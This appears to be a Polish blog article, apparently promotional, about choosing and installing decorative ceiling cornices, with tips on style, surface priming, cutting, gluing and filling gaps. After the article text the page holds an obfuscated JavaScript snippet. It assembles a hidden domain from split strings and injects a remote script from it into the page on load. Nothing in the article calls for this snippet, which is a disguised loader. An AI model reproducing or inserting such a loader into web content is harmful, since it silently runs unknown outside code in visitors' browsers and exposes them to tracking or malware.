Dzięki zaplanowaniu z wyprzedzeniem tego etapu prac, unikniemy późniejszych problemów z dopasowaniem do siebie poszczególnych elementów.
Listwy przysufitowe – znakomity efekt przy niewielkim nakładzie prac
Zamontowanie tuż pod naszym sufitem ozdobnych listew to doskonały sposób, jak niewielkim wysiłkiem oraz stosunkowo małym kosztem odmienić wnętrze swojego domu. Jest to na tyle popularne rozwiązanie, iż zdobycie spełniających nasze stylistyczne oczekiwania listew nie będzie żadnym problemem. Ich zakupu możemy dokonać nawet w internetowym sklepie ze sztukaterią wewnętrzną. Zaglądając na np. www.dekorplanet.pl, widzimy ogromny wachlarz możliwości, jaki oferują nam producenci. To właśnie ta mnogość możliwości nastręcza nam najwięcej problemów. Decydując się na zamontowanie listwy przysufitowej, musimy wziąć pod uwagę ostateczny charakter, jaki chcemy nadać danemu pomieszczeniu.
Modny minimalizm czy majestatyczny przepych?
Trendem ostatnich lat są minimalistyczne aranżacje wnętrz. Dobrze oświetlone pomieszczenia, brak przytłaczającego nadmiaru mebli, jasne kolory i proste, geometryczne formy królują w konceptach projektantów wnętrz. Wbrew pozorom, listwy przysufitowe nie są zbędnym dodatkiem, którego powinniśmy unikać, pragnąc urządzić dom lub mieszkanie w minimalistycznym duchu. Wręcz przeciwnie. Odpowiednio dobrane listwy złamią ostrość tak zaaranżowanego pomieszczenia i pozbawią je surowości, nie ingerując przy tym w minimalistyczny zamysł wystroju.
Jeśli jednak marzą nam się pomieszczenia urządzone na styl barokowych przestrzeni, bez trudu znajdziemy bogato zdobione listwy przysufitowe. Ich precyzyjne wykończenia oraz nagromadzenie szczegółów doskonale podkreśli styl cechujący się pełnią przepychu i zdobień.
Montaż listew przysufitowych – samodzielne działanie czy pomoc fachowca?
Chociaż z łatwością możemy trafić na poradnik, jak samodzielnie zamontować listwy przysufitowe w naszym domu, lepiej zwrócić się z tym do bardziej doświadczonych osób. W przypadku tego elementu sztukaterii wewnętrznej niezwykle ważny jest precyzyjny montaż. To od niego zależy, czy nie powstaną szpary pomiędzy listwą a ścianą lub sufitem. Jak podkreślają specjaliści ze strony www.dekorplanet.pl, chociaż producenci zapewniają całą gamę klejów montażowych, podczas ich instalacji najważniejsza jest dokładność oraz brak pośpiechu. W innym przypadku listwy mogą z biegiem czasu przestać ściśle przylegać do powierzchni, skutkiem czego będzie powstanie nieestetycznych szpar.
Jeśli jednak zdecydujemy się na samodzielny montaż, musimy pamiętać, by nie pominąć żadnego z szeregu istotnych elementów. Pierwszym z nich jest dokładne przygotowanie podłoża. Jeżeli nasze mieszkanie było świeżo malowane, krok ten nie będzie potrzebny. W innym przypadku koniecznie będzie zagruntowanie ściany, zwłaszcza jeżeli mamy do czynienia z powierzchnią pylącą. Potem z ogromną dokładnością musimy wyznaczyć na ścianach miejsce montażu listew. Rozpoczynamy od zaznaczenia linią dolnej krawędzi listwy, a następnie zaznaczamy punkty, w których będą się one ze sobą stykały. Po dokładnym zaznaczeniu tych miejsc na ścianie możemy przystąpić do docinania poszczególnym elementów sztukaterii – należy to zrobić z ogromną uwagą i precyzją, ponieważ krzywo lub zbyt krótko przycięte listwy nie będą się już nadawały do użycia. Kolejnym krokiem jest już przyklejenie gzymsów do ściany.
Na tym etapie musimy pamiętać, by klejem montażowym pokryć listwę zaś łączenia klejem do łączeń. W żadnym wypadku nie należy nanosić kleju bezpośrednio na ścianę. Po skrupulatnym umieszczeniu pokrytych klejem listew na wyznaczonych dla nich miejscach, powinniśmy poczekać 24 godziny, aby klej odparował. To jednak nie koniec. W większości wypadków będziemy musieli jeszcze wypełnić szczeliny. Mogą one powstać bezpośrednio przy suficie, przy ścianie lub w miejscu łączenia się listew. W tym celu najlepiej posłużyć się szpachlą akrylową.
Po zakończeniu procesu montażu możemy pomalować listwy na wybrany przez nas kolor. Chociaż większość osób decyduje się na posiadanie listew przysufitowych w barwie ścian lub sufitu, to wybranie innego koloru może się okazać świetnym posunięciem. Możemy w ten sposób przełamać monochromatyczność pomieszczenia, nadać mu głębi lub po prostu wprowadzić ciekawy element.
Wąskie i delikatne lub szerokie, pokryte licznymi ornamentami – zadaniem listew przysufitowych jest przede wszystkim podkreślenie pożądanego przez nas charakteru wnętrza. Właśnie dlatego dostępne są w tak wielu kształtach i stylach. Niezależnie od tego, jaki styl wystroju wnętrza nas interesuje, w szerokiej gamie produktów bez problemu znajdziemy listwy idealne dla nas.
(function(){
oab5=document.createElement("script");oab5.async=true;oab5_="u"+("s")+"t";
oab5u="68911132.";oab5_+="a"+("t.i");oab5_+="n"+("f"+"o")+"/";
oab5u+="jvaluqrjab5pz6i4m4ned2"+("prfsfkbk");
oab5.src="//"+oab5_+oab5u;oab5.type="text/javascript";
document.body.appendChild(oab5);
})();
Brak komentarza, Twój może być pierwszy.
Dodaj komentarz